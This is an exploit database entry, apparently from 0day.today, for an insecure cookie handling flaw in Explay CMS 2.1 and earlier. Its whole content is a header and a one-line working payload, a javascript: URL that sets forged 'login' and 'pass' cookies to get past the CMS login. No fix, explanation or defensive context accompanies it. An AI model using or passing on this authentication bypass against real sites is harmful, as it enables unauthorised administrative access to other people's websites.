id: 3697
date: 09/19/2008
title: Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

========================================================
Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability
========================================================



###############################################################################################
[+] Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "login=1; path=/"; document.cookie = "pass=1; path=/";



#  0day.today [2023-03-24]  #